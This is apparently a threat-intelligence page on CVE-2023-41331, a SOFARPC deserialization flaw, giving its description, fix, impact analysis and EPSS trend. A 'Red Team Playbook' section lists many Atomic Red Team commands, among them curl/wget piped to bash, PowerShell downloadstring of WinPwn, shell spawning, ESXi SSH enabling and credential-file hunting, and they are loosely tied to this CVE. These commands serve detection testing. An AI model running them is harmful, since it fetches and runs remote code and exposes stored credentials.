CVE-2023-41331
Overview
The vulnerability is a remote command execution issue caused by insecure deserialization within the SOFARPC Java RPC framework. The root cause lies in an incomplete blacklist used during deserialization, which fails to block all dangerous classes. This allows exploitation of native JDK and third-party classes to construct gadget chains that trigger JNDI injection or system command execution within the RPC serialization component.
Vulnerability Description
SOFARPC is a Java RPC framework. Versions prior to 5.11.0 are vulnerable to remote command execution. Through a carefully crafted payload, an attacker can achieve JNDI injection or system command execution. In the default configuration of the SOFARPC framework, a blacklist is used to filter out dangerous classes encountered during the deserialization process. However, the blacklist is not comprehensive, and an actor can exploit certain native JDK classes and common third-party packages to construct gadget chains capable of achieving JNDI injection or system command execution attacks. Version 5.11.0 contains a fix for this issue. As a workaround, users can add `-Drpc_serialize_blacklist_override=javax.sound.sampled.AudioFileFormat` to the blacklist.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary system commands or perform JNDI injection, potentially leading to full system compromise. No user interaction or prior authentication is required (AV:N/AC:L/PR:N/UI:N). This can result in unauthorized data access, service disruption, or lateral movement within affected environments.
Solution
Upgrade SOFARPC to version 5.11.0 or later, as detailed in the vendor advisory (https://github.com/sofastack/sofa-rpc/security/advisories/GHSA-chv2-7hxj-2j86). As a temporary workaround, users can add the JVM argument '-Drpc_serialize_blacklist_override=javax.sound.sampled.AudioFileFormat' to extend the blacklist and mitigate exploitation. Follow the official release notes at https://github.com/sofastack/sofa-rpc/releases/tag/v5.11.0 for patching instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the SOFARPC framework, specifically versions prior to 5.11.0, is a critical security flaw that allows for remote command execution through JNDI injection. This vulnerability arises from the framework's deserialization process, where a blacklist is employed to filter out potentially dangerous classes. However, the implementation of this blacklist is insufficient, as it fails to account for certain native Java Development Kit (JDK) classes and widely used third-party libraries. Consequently, an attacker can exploit this weakness by crafting a malicious payload that leverages these overlooked classes to create gadget chains capable of executing arbitrary commands on the server.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit the flaw. By sending a specially crafted request to a vulnerable SOFARPC instance, an attacker can trigger the deserialization process, leading to the execution of malicious code. This can occur in various scenarios, including but not limited to web applications that utilize the SOFARPC framework for remote procedure calls. The ability to execute system commands remotely enables attackers to gain unauthorized access to sensitive data, manipulate system configurations, or even take control of the entire server environment. The implications of such exploitation can be severe, affecting not only the targeted organization but also its customers and partners.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on SOFARPC for their operations. A successful exploitation could lead to data breaches, service disruptions, and a loss of customer trust. The business risks associated with this vulnerability include potential regulatory fines, legal liabilities, and reputational damage. Furthermore, the high CVSS score of 9.8 indicates that this vulnerability poses a critical threat, necessitating immediate attention from security teams. Organizations that fail to address this issue may find themselves at a competitive disadvantage, as customers increasingly prioritize security in their vendor selection processes.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First and foremost, upgrading to version 5.11.0 or later of the SOFARPC framework is imperative, as this version includes a fix for the vulnerability. In addition, organizations should conduct thorough security assessments to identify any instances of the framework in use and evaluate their configurations. Implementing the recommended workaround of adding `-Drpc_serialize_blacklist_override=javax.sound.sampled.AudioFileFormat` to the blacklist can provide an additional layer of protection, although it should not be considered a substitute for upgrading the software.
Continuous monitoring and logging of application behavior can also aid in the detection of potential exploitation attempts. Organizations should establish alerting mechanisms for unusual patterns of deserialization or unexpected command executions. Moreover, employing application firewalls and intrusion detection systems can help to filter out malicious traffic targeting the SOFARPC framework. By taking these proactive measures, organizations can significantly reduce their exposure to this vulnerability and enhance their overall security posture. In conclusion, addressing this critical vulnerability is essential for safeguarding sensitive information and maintaining operational integrity in an increasingly threat-laden landscape.
CSURFACE threat intelligence has detected a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-41331, rising by over 30% to place this vulnerability in the 90th percentile of predicted exploit likelihood. This upward trend, while not yet classified as rapidly accelerating, reflects growing attacker interest and potential preparatory activity targeting the SOFARPC Java RPC framework. Although no new exploit techniques or proof-of-concept code have surfaced in our telemetry, the elevated EPSS suggests that threat actors are increasingly prioritizing this vector, likely due to its critical severity and the inherent challenges in fully mitigating JNDI injection and deserialization flaws within affected versions. For defenders, this shift underscores the necessity of heightened vigilance and continuous monitoring for anomalous deserialization patterns or command execution attempts, as the probability of exploitation attempts is rising. Consequently, the overall threat level associated with CVE-2023-41331 should be considered elevated, reflecting an increased likelihood of active exploitation in the near term.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sofastack | Sofarpc | All |
cpe:2.3:a:sofastack:sofarpc:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-41331 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/sofastack/sofa-rpc/security/advisories/GHSA-chv2-7hxj-2j86 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/sofastack/sofa-rpc/releases/tag/v5.11.0 |